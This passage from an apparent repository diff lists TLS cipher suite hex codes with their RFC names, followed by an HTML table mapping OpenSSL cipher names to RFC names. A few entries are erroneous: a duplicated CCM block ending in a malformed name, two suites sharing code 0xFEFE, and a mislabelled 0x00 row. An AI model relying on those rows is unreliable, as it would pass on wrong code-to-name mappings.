0x3B TLS_RSA_WITH_NULL_SHA256
0x3C TLS_RSA_WITH_AES_128_CBC_SHA256
0x3D TLS_RSA_WITH_AES_256_CBC_SHA256
0x3E TLS_DH_DSS_WITH_AES_128_CBC_SHA256
0x3F TLS_DH_RSA_WITH_AES_128_CBC_SHA256
0x40 TLS_DHE_DSS_WITH_AES_128_CBC_SHA256
0x41 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
0x42 TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA
0x43 TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA
0x44 TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA
0x45 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
0x46 TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA
0x60 TLS_RSA_EXPORT1024_WITH_RC4_56_MD5
0x61 TLS_RSA_EXPORT1024_WITH_RC2_56_MD5
0x62 TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
0x63 TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA
0x64 TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
0x65 TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA
0x66 TLS_DHE_DSS_WITH_RC4_128_SHA
0x67 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
0x68 TLS_DH_DSS_WITH_AES_256_CBC_SHA256
0x69 TLS_DH_RSA_WITH_AES_256_CBC_SHA256
0x6A TLS_DHE_DSS_WITH_AES_256_CBC_SHA256
0x6B TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
0x6C TLS_DH_anon_WITH_AES_128_CBC_SHA256
0x6D TLS_DH_anon_WITH_AES_256_CBC_SHA256
0x80 TLS_GOSTR341094_WITH_28147_CNT_IMIT
0x81 TLS_GOSTR341001_WITH_28147_CNT_IMIT
0x82 TLS_GOSTR341094_WITH_NULL_GOSTR3411
0x83 TLS_GOSTR341001_WITH_NULL_GOSTR3411
0x84 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
0x85 TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA
0x86 TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA
0x87 TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA
0x88 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
0x89 TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA
0x8A TLS_PSK_WITH_RC4_128_SHA
0x8B TLS_PSK_WITH_3DES_EDE_CBC_SHA
0x8C TLS_PSK_WITH_AES_128_CBC_SHA
0x8D TLS_PSK_WITH_AES_256_CBC_SHA
0x8E TLS_DHE_PSK_WITH_RC4_128_SHA
0x8F TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA
0x90 TLS_DHE_PSK_WITH_AES_128_CBC_SHA
0x91 TLS_DHE_PSK_WITH_AES_256_CBC_SHA
0x92 TLS_RSA_PSK_WITH_RC4_128_SHA
0x93 TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA
0x94 TLS_RSA_PSK_WITH_AES_128_CBC_SHA
0x95 TLS_RSA_PSK_WITH_AES_256_CBC_SHA
0x96 TLS_RSA_WITH_SEED_CBC_SHA
0x97 TLS_DH_DSS_WITH_SEED_CBC_SHA
0x98 TLS_DH_RSA_WITH_SEED_CBC_SHA
0x99 TLS_DHE_DSS_WITH_SEED_CBC_SHA
0x9A TLS_DHE_RSA_WITH_SEED_CBC_SHA
0x9B TLS_DH_anon_WITH_SEED_CBC_SHA
0x9C TLS_RSA_WITH_AES_128_GCM_SHA256
0x9D TLS_RSA_WITH_AES_256_GCM_SHA384
0x9E TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
0x9F TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
0xA0 TLS_DH_RSA_WITH_AES_128_GCM_SHA256
0xA1 TLS_DH_RSA_WITH_AES_256_GCM_SHA384
0xA2 TLS_DHE_DSS_WITH_AES_128_GCM_SHA256
0xA3 TLS_DHE_DSS_WITH_AES_256_GCM_SHA384
0xA4 TLS_DH_DSS_WITH_AES_128_GCM_SHA256
0xA5 TLS_DH_DSS_WITH_AES_256_GCM_SHA384
0xA6 TLS_DH_anon_WITH_AES_128_GCM_SHA256
0xA7 TLS_DH_anon_WITH_AES_256_GCM_SHA384
0xA8 TLS_PSK_WITH_AES_128_GCM_SHA256
0xA9 TLS_PSK_WITH_AES_256_GCM_SHA384
0xAA TLS_DHE_PSK_WITH_AES_128_GCM_SHA256
0xAB TLS_DHE_PSK_WITH_AES_256_GCM_SHA384
0xAC TLS_RSA_PSK_WITH_AES_128_GCM_SHA256
0xAD TLS_RSA_PSK_WITH_AES_256_GCM_SHA384
0xAE TLS_PSK_WITH_AES_128_CBC_SHA256
0xAF TLS_PSK_WITH_AES_256_CBC_SHA384
0xB0 TLS_PSK_WITH_NULL_SHA256
0xB1 TLS_PSK_WITH_NULL_SHA384
0xB2 TLS_DHE_PSK_WITH_AES_128_CBC_SHA256
0xB3 TLS_DHE_PSK_WITH_AES_256_CBC_SHA384
0xB4 TLS_DHE_PSK_WITH_NULL_SHA256
0xB5 TLS_DHE_PSK_WITH_NULL_SHA384
0xB6 TLS_RSA_PSK_WITH_AES_128_CBC_SHA256
0xB7 TLS_RSA_PSK_WITH_AES_256_CBC_SHA384
0xB8 TLS_RSA_PSK_WITH_NULL_SHA256
0xB9 TLS_RSA_PSK_WITH_NULL_SHA384
0xBA TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256
0xBB TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256
0xBC TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256
0xBD TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256
0xBE TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
0xBF TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256
0xC0 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256
0xC1 TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256
0xC2 TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256
0xC3 TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256
0xC4 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256
0xC5 TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256
0xFF TLS_EMPTY_RENEGOTIATION_INFO_SCSV
0xC001 TLS_ECDH_ECDSA_WITH_NULL_SHA
0xC002 TLS_ECDH_ECDSA_WITH_RC4_128_SHA
0xC003 TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
0xC004 TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
0xC005 TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
0xC006 TLS_ECDHE_ECDSA_WITH_NULL_SHA
0xC007 TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
0xC008 TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
0xC009 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
0xC00A TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
0xC00B TLS_ECDH_RSA_WITH_NULL_SHA
0xC00C TLS_ECDH_RSA_WITH_RC4_128_SHA
0xC00D TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
0xC00E TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
0xC00F TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
0xC010 TLS_ECDHE_RSA_WITH_NULL_SHA
0xC011 TLS_ECDHE_RSA_WITH_RC4_128_SHA
0xC012 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
0xC013 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
0xC014 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
0xC015 TLS_ECDH_anon_WITH_NULL_SHA
0xC016 TLS_ECDH_anon_WITH_RC4_128_SHA
0xC017 TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA
0xC018 TLS_ECDH_anon_WITH_AES_128_CBC_SHA
0xC019 TLS_ECDH_anon_WITH_AES_256_CBC_SHA
0xC01A TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA
0xC01B TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA
0xC01C TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA
0xC01D TLS_SRP_SHA_WITH_AES_128_CBC_SHA
0xC01E TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
0xC01F TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA
0xC020 TLS_SRP_SHA_WITH_AES_256_CBC_SHA
0xC021 TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
0xC022 TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA
0xC023 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
0xC024 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
0xC025 TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256
0xC026 TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384
0xC027 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
0xC028 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
0xC029 TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256
0xC02A TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384
0xC02B TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
0xC02C TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
0xC02D TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256
0xC02E TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384
0xC02F TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
0xC030 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
0xC031 TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256
0xC032 TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384
0xC033 TLS_ECDHE_PSK_WITH_RC4_128_SHA
0xC034 TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA
0xC035 TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA
0xC036 TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA
0xC037 TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256
0xC038 TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384
0xC039 TLS_ECDHE_PSK_WITH_NULL_SHA
0xC03A TLS_ECDHE_PSK_WITH_NULL_SHA256
0xC03B TLS_ECDHE_PSK_WITH_NULL_SHA384
0xC03C TLS_RSA_WITH_ARIA_128_CBC_SHA256
0xC03D TLS_RSA_WITH_ARIA_256_CBC_SHA384
0xC03E TLS_DH_DSS_WITH_ARIA_128_CBC_SHA256
0xC03F TLS_DH_DSS_WITH_ARIA_256_CBC_SHA384
0xC040 TLS_DH_RSA_WITH_ARIA_128_CBC_SHA256
0xC041 TLS_DH_RSA_WITH_ARIA_256_CBC_SHA384
0xC042 TLS_DHE_DSS_WITH_ARIA_128_CBC_SHA256
0xC043 TLS_DHE_DSS_WITH_ARIA_256_CBC_SHA384
0xC044 TLS_DHE_RSA_WITH_ARIA_128_CBC_SHA256
0xC045 TLS_DHE_RSA_WITH_ARIA_256_CBC_SHA384
0xC046 TLS_DH_anon_WITH_ARIA_128_CBC_SHA256
0xC047 TLS_DH_anon_WITH_ARIA_256_CBC_SHA384
0xC048 TLS_ECDHE_ECDSA_WITH_ARIA_128_CBC_SHA256
0xC049 TLS_ECDHE_ECDSA_WITH_ARIA_256_CBC_SHA384
0xC04A TLS_ECDH_ECDSA_WITH_ARIA_128_CBC_SHA256
0xC04B TLS_ECDH_ECDSA_WITH_ARIA_256_CBC_SHA384
0xC04C TLS_ECDHE_RSA_WITH_ARIA_128_CBC_SHA256
0xC04D TLS_ECDHE_RSA_WITH_ARIA_256_CBC_SHA384
0xC04E TLS_ECDH_RSA_WITH_ARIA_128_CBC_SHA256
0xC04F TLS_ECDH_RSA_WITH_ARIA_256_CBC_SHA384
0xC050 TLS_RSA_WITH_ARIA_128_GCM_SHA256
0xC051 TLS_RSA_WITH_ARIA_256_GCM_SHA384
0xC052 TLS_DHE_RSA_WITH_ARIA_128_GCM_SHA256
0xC053 TLS_DHE_RSA_WITH_ARIA_256_GCM_SHA384
0xC054 TLS_DH_RSA_WITH_ARIA_128_GCM_SHA256
0xC055 TLS_DH_RSA_WITH_ARIA_256_GCM_SHA384
0xC056 TLS_DHE_DSS_WITH_ARIA_128_GCM_SHA256
0xC057 TLS_DHE_DSS_WITH_ARIA_256_GCM_SHA384
0xC058 TLS_DH_DSS_WITH_ARIA_128_GCM_SHA256
0xC059 TLS_DH_DSS_WITH_ARIA_256_GCM_SHA384
0xC05A TLS_DH_anon_WITH_ARIA_128_GCM_SHA256
0xC05B TLS_DH_anon_WITH_ARIA_256_GCM_SHA384
0xC05C TLS_ECDHE_ECDSA_WITH_ARIA_128_GCM_SHA256
0xC05D TLS_ECDHE_ECDSA_WITH_ARIA_256_GCM_SHA384
0xC05E TLS_ECDH_ECDSA_WITH_ARIA_128_GCM_SHA256
0xC05F TLS_ECDH_ECDSA_WITH_ARIA_256_GCM_SHA384
0xC060 TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256
0xC061 TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384
0xC062 TLS_ECDH_RSA_WITH_ARIA_128_GCM_SHA256
0xC063 TLS_ECDH_RSA_WITH_ARIA_256_GCM_SHA384
0xC064 TLS_PSK_WITH_ARIA_128_CBC_SHA256
0xC065 TLS_PSK_WITH_ARIA_256_CBC_SHA384
0xC066 TLS_DHE_PSK_WITH_ARIA_128_CBC_SHA256
0xC067 TLS_DHE_PSK_WITH_ARIA_256_CBC_SHA384
0xC068 TLS_RSA_PSK_WITH_ARIA_128_CBC_SHA256
0xC069 TLS_RSA_PSK_WITH_ARIA_256_CBC_SHA384
0xC06A TLS_PSK_WITH_ARIA_128_GCM_SHA256
0xC06B TLS_PSK_WITH_ARIA_256_GCM_SHA384
0xC06C TLS_DHE_PSK_WITH_ARIA_128_GCM_SHA256
0xC06D TLS_DHE_PSK_WITH_ARIA_256_GCM_SHA384
0xC06E TLS_RSA_PSK_WITH_ARIA_128_GCM_SHA256
0xC06F TLS_RSA_PSK_WITH_ARIA_256_GCM_SHA384
0xC070 TLS_ECDHE_PSK_WITH_ARIA_128_CBC_SHA256
0xC071 TLS_ECDHE_PSK_WITH_ARIA_256_CBC_SHA384
0xC072 TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256
0xC073 TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384
0xC074 TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256
0xC075 TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384
0xC076 TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
0xC077 TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384
0xC078 TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256
0xC079 TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384
0xC07A TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256
0xC07B TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384
0xC07C TLS_DHE_RSA_WITH_CAMELLIA_128_GCM_SHA256
0xC07D TLS_DHE_RSA_WITH_CAMELLIA_256_GCM_SHA384
0xC07E TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256
0xC07F TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384
0xC080 TLS_DHE_DSS_WITH_CAMELLIA_128_GCM_SHA256
0xC081 TLS_DHE_DSS_WITH_CAMELLIA_256_GCM_SHA384
0xC082 TLS_DH_DSS_WITH_CAMELLIA_128_GCM_SHA256
0xC083 TLS_DH_DSS_WITH_CAMELLIA_256_GCM_SHA384
0xC084 TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256
0xC085 TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384
0xC086 TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_GCM_SHA256
0xC087 TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_GCM_SHA384
0xC088 TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256
0xC089 TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384
0xC08A TLS_ECDHE_RSA_WITH_CAMELLIA_128_GCM_SHA256
0xC08B TLS_ECDHE_RSA_WITH_CAMELLIA_256_GCM_SHA384
0xC08C TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256
0xC08D TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384
0xC08E TLS_PSK_WITH_CAMELLIA_128_GCM_SHA256
0xC08F TLS_PSK_WITH_CAMELLIA_256_GCM_SHA384
0xC090 TLS_DHE_PSK_WITH_CAMELLIA_128_GCM_SHA256
0xC091 TLS_DHE_PSK_WITH_CAMELLIA_256_GCM_SHA384
0xC092 TLS_RSA_PSK_WITH_CAMELLIA_128_GCM_SHA256
0xC093 TLS_RSA_PSK_WITH_CAMELLIA_256_GCM_SHA384
0xC094 TLS_PSK_WITH_CAMELLIA_128_CBC_SHA256
0xC095 TLS_PSK_WITH_CAMELLIA_256_CBC_SHA384
0xC096 TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256
0xC097 TLS_DHE_PSK_WITH_CAMELLIA_256_CBC_SHA384
0xC098 TLS_RSA_PSK_WITH_CAMELLIA_128_CBC_SHA256
0xC099 TLS_RSA_PSK_WITH_CAMELLIA_256_CBC_SHA384
0xC09A TLS_ECDHE_PSK_WITH_CAMELLIA_128_CBC_SHA256
0xC09B TLS_ECDHE_PSK_WITH_CAMELLIA_256_CBC_SHA384
0xC09C TLS_RSA_WITH_AES_128_CCM
0xC09D TLS_RSA_WITH_AES_256_CCM
0xC09E TLS_DHE_RSA_WITH_AES_128_CCM
0xC09F TLS_DHE_RSA_WITH_AES_256_CCM
0xC0A0 TLS_RSA_WITH_AES_128_CCM_8
0xC0A1 TLS_RSA_WITH_AES_256_CCM_8
0xC0A2 TLS_DHE_RSA_WITH_AES_128_CCM_8
0xC0A3 TLS_DHE_RSA_WITH_AES_256_CCM_8
0xC0A4 TLS_PSK_WITH_AES_128_CCM
0xC0A5 TLS_PSK_WITH_AES_256_CCM
0xC0A6 TLS_DHE_PSK_WITH_AES_128_CCM
0xC0A7 TLS_DHE_PSK_WITH_AES_256_CCM
0xC0A8 TLS_PSK_WITH_AES_128_CCM_8
0xC0A9 TLS_PSK_WITH_AES_256_CCM_8
0xC0AA TLS_PSK_DHE_WITH_AES_128_CCM_8
0xC0AB TLS_PSK_DHE_WITH_AES_256_CCM_8
0xC09C TLS_RSA_WITH_AES_128_CCM
0xC09D TLS_RSA_WITH_AES_256_CCM
0xC09E TLS_DHE_RSA_WITH_AES_128_CCM
0xC09F TLS_DHE_RSA_WITH_AES_256_CCM
0xC0A0 TLS_RSA_WITH_AES_128_CCM_8
0xC0A1 TLS_RSA_WITH_AES_256_CCM_8
0xC0A2 TLS_DHE_RSA_WITH_AES_128_CCM_8
0xC0A3 TLS_DHE_RSA_WITH_AES_256_CCM_8
0xC0A4 TLS_PSK_WITH_AES_128_CCM
0xC0A5 TLS_PSK_WITH_AES_256_CCM
0xC0A6 TLS_DHE_PSK_WITH_AES_128_CCM
0xC0A7 TLS_DHE_PSK_WITH_AES_256_CCM
0xC0A8 TLS_PSK_WITH_AES_128_CCM_8
0xC0A9 TLS_PSK_WITH_AES_256_CCM_8
0xC0AA TLS_PSK_DHE_WITH_AES_128_CCM_8
0xC0AB TLS_PSK_DHE_WITH_AES_256_CCM_80
0xC0AC TLS_ECDHE_ECDSA_WITH_AES_128_CCM
0xC0AD TLS_ECDHE_ECDSA_WITH_AES_256_CCM
0xC0AE TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8
0xC0AF TLS_ECDHE_ECDSA_WITH_AES_256_CCM_8
0xCC13 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
0xCC14 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
0xCC15 TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256
0xFEFE SSL_RSA_FIPS_WITH_DES_CBC_SHA
0xFEFE SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
0xFFE0 SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
0xFFE1 SSL_RSA_FIPS_WITH_DES_CBC_SHA

192
openssl-rfc.mappping.html Executable file
View File

@ -0,0 +1,192 @@
<html>
<head>
<title>Mapping OpenSSL sipher suite names to RFC names</title>
</head>
<style type="text/css">
.mytable { background-color:#eee;border-collapse:collapse; text-align:left; table-layout: fixed; width:1000px; }
.mytable th { padding:3px; border:1px solid #000; background-color:#888 ;color:white ;width:50%; font-family:Helvetica; overflow: hidden; }
.mytable td { padding:3px; border:1px solid #888; empty-cells:hide; font-family:Helvetica; font-size:80%; overflow: hidden; }
</style>
<body>
<br>
<table class="mytable">
<col width="8%" />
<col width="26%" />
<col width="10%" />
<col width="9%" />
<col width="8%" />
<col width="39%" />
<tr><th>Cipher Suite</th><th> Name (OpenSSL)</th><th> KeyExch. </th><th> Encryption </th><th> Bits </th><th>Cipher Suite Name (RFC)</th></tr>
<tr><td> [0x00]</td><td> NULL-MD5 </td><td> RSA(512) </td><td> None </td><td> None, export </td><td> TLS_NULL_WITH_NULL_NULL </td></tr>
<tr><td> [0x01]</td><td> NULL-MD5 </td><td> RSA </td><td> None </td><td> None </td><td> TLS_RSA_WITH_NULL_MD5 </td></tr>
<tr><td> [0x02]</td><td> NULL-SHA </td><td> RSA </td><td> None </td><td> None </td><td> TLS_RSA_WITH_NULL_SHA </td></tr>
<tr><td> [0x03]</td><td> EXP-RC4-MD5 </td><td> RSA(512) </td><td> RC4 </td><td> 40, export </td><td> TLS_RSA_EXPORT_WITH_RC4_40_MD5 </td></tr>
<tr><td> [0x04]</td><td> RC4-MD5 </td><td> RSA </td><td> RC4 </td><td> 128 </td><td> TLS_RSA_WITH_RC4_128_MD5 </td></tr>
<tr><td> [0x05]</td><td> RC4-SHA </td><td> RSA </td><td> RC4 </td><td> 128 </td><td> TLS_RSA_WITH_RC4_128_SHA </td></tr>
<tr><td> [0x06]</td><td> EXP-RC2-CBC-MD5 </td><td> RSA(512) </td><td> RC2 </td><td> 40, export </td><td> TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 </td></tr>
<tr><td> [0x07]</td><td> IDEA-CBC-SHA </td><td> RSA </td><td> IDEA </td><td> 128 </td><td> TLS_RSA_WITH_IDEA_CBC_SHA </td></tr>
<tr><td> [0x08]</td><td> EXP-DES-CBC-SHA </td><td> RSA(512) </td><td> DES </td><td> 40, export </td><td> TLS_RSA_EXPORT_WITH_DES40_CBC_SHA </td></tr>
<tr><td> [0x09]</td><td> DES-CBC-SHA </td><td> RSA </td><td> DES </td><td> 56 </td><td> TLS_RSA_WITH_DES_CBC_SHA </td></tr>
<tr><td> [0x0a]</td><td> DES-CBC3-SHA </td><td> RSA </td><td> 3DES </td><td> 168 </td><td> TLS_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0x0b]</td><td> EXP-DH-DSS-DES-CBC-SHA </td><td> DH/DSS </td><td> DES </td><td> 40, export </td><td> TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA </td></tr>
<tr><td> [0x0c]</td><td> DH-DSS-DES-CBC-SHA </td><td> DH/DSS </td><td> DES </td><td> 56 </td><td> TLS_DH_DSS_WITH_DES_CBC_SHA </td></tr>
<tr><td> [0x0d]</td><td> DH-DSS-DES-CBC3-SHA </td><td> DH/DSS </td><td> 3DES </td><td> 168 </td><td> TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0x0e]</td><td> EXP-DH-RSA-DES-CBC-SHA </td><td> DH/RSA </td><td> DES </td><td> 40, export </td><td> TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA </td></tr>
<tr><td> [0x0f]</td><td> DH-RSA-DES-CBC-SHA </td><td> DH/RSA </td><td> DES </td><td> 56 </td><td> TLS_DH_RSA_WITH_DES_CBC_SHA </td></tr>
<tr><td> [0x10]</td><td> DH-RSA-DES-CBC3-SHA </td><td> DH/RSA </td><td> 3DES </td><td> 168 </td><td> TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0x11]</td><td> EXP-EDH-DSS-DES-CBC-SHA </td><td> DH(512) </td><td> DES </td><td> 40, export </td><td> TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA </td></tr>
<tr><td> [0x12]</td><td> EDH-DSS-DES-CBC-SHA </td><td> DH </td><td> DES </td><td> 56 </td><td> TLS_DHE_DSS_WITH_DES_CBC_SHA </td></tr>
<tr><td> [0x13]</td><td> EDH-DSS-DES-CBC3-SHA </td><td> DH </td><td> 3DES </td><td> 168 </td><td> TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0x14]</td><td> EXP-EDH-RSA-DES-CBC-SHA </td><td> DH(512) </td><td> DES </td><td> 40, export </td><td> TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA </td></tr>
<tr><td> [0x15]</td><td> EDH-RSA-DES-CBC-SHA </td><td> DH </td><td> DES </td><td> 56 </td><td> TLS_DHE_RSA_WITH_DES_CBC_SHA </td></tr>
<tr><td> [0x16]</td><td> EDH-RSA-DES-CBC3-SHA </td><td> DH </td><td> 3DES </td><td> 168 </td><td> TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0x17]</td><td> EXP-ADH-RC4-MD5 </td><td> DH(512) </td><td> RC4 </td><td> 40, export </td><td> TLS_DH_anon_EXPORT_WITH_RC4_40_MD5 </td></tr>
<tr><td> [0x18]</td><td> ADH-RC4-MD5 </td><td> DH </td><td> RC4 </td><td> 128 </td><td> TLS_DH_anon_WITH_RC4_128_MD5 </td></tr>
<tr><td> [0x19]</td><td> EXP-ADH-DES-CBC-SHA </td><td> DH(512) </td><td> DES </td><td> 40, export </td><td> TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA </td></tr>
<tr><td> [0x1a]</td><td> ADH-DES-CBC-SHA </td><td> DH </td><td> DES </td><td> 56 </td><td> TLS_DH_anon_WITH_DES_CBC_SHA </td></tr>
<tr><td> [0x1b]</td><td> ADH-DES-CBC3-SHA </td><td> DH </td><td> 3DES </td><td> 168 </td><td> TLS_DH_anon_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0x1e]</td><td> KRB5-DES-CBC-SHA </td><td> KRB5 </td><td> DES </td><td> 56 </td><td> TLS_KRB5_WITH_DES_CBC_SHA </td></tr>
<tr><td> [0x1f]</td><td> KRB5-DES-CBC3-SHA </td><td> KRB5 </td><td> 3DES </td><td> 168 </td><td> TLS_KRB5_WITH_3DES_EDE_CBC_SHA </td></tr>
<tr><td> [0x20]</td><td> KRB5-RC4-SHA </td><td> KRB5 </td><td> RC4 </td><td> 128 </td><td> TLS_KRB5_WITH_RC4_128_SHA </td></tr>
<tr><td> [0x21]</td><td> KRB5-IDEA-CBC-SHA </td><td> KRB5 </td><td> IDEA </td><td> 128 </td><td> TLS_KRB5_WITH_IDEA_CBC_SHA </td></tr>
<tr><td> [0x22]</td><td> KRB5-DES-CBC-MD5 </td><td> KRB5 </td><td> DES </td><td> 56 </td><td> TLS_KRB5_WITH_DES_CBC_MD5 </td></tr>
<tr><td> [0x23]</td><td> KRB5-DES-CBC3-MD5 </td><td> KRB5 </td><td> 3DES </td><td> 168 </td><td> TLS_KRB5_WITH_3DES_EDE_CBC_MD5 </td></tr>
<tr><td> [0x24]</td><td> KRB5-RC4-MD5 </td><td> KRB5 </td><td> RC4 </td><td> 128 </td><td> TLS_KRB5_WITH_RC4_128_MD5 </td></tr>
<tr><td> [0x25]</td><td> KRB5-IDEA-CBC-MD5 </td><td> KRB5 </td><td> IDEA </td><td> 128 </td><td> TLS_KRB5_WITH_IDEA_CBC_MD5 </td></tr>
<tr><td> [0x26]</td><td> EXP-KRB5-DES-CBC-SHA </td><td> KRB5 </td><td> DES </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA </td></tr>
<tr><td> [0x27]</td><td> EXP-KRB5-RC2-CBC-SHA </td><td> KRB5 </td><td> RC2 </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA </td></tr>
<tr><td> [0x28]</td><td> EXP-KRB5-RC4-SHA </td><td> KRB5 </td><td> RC4 </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_RC4_40_SHA </td></tr>
<tr><td> [0x29]</td><td> EXP-KRB5-DES-CBC-MD5 </td><td> KRB5 </td><td> DES </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5 </td></tr>
<tr><td> [0x2a]</td><td> EXP-KRB5-RC2-CBC-MD5 </td><td> KRB5 </td><td> RC2 </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5 </td></tr>
<tr><td> [0x2b]</td><td> EXP-KRB5-RC4-MD5 </td><td> KRB5 </td><td> RC4 </td><td> 40, export </td><td> TLS_KRB5_EXPORT_WITH_RC4_40_MD5 </td></tr>
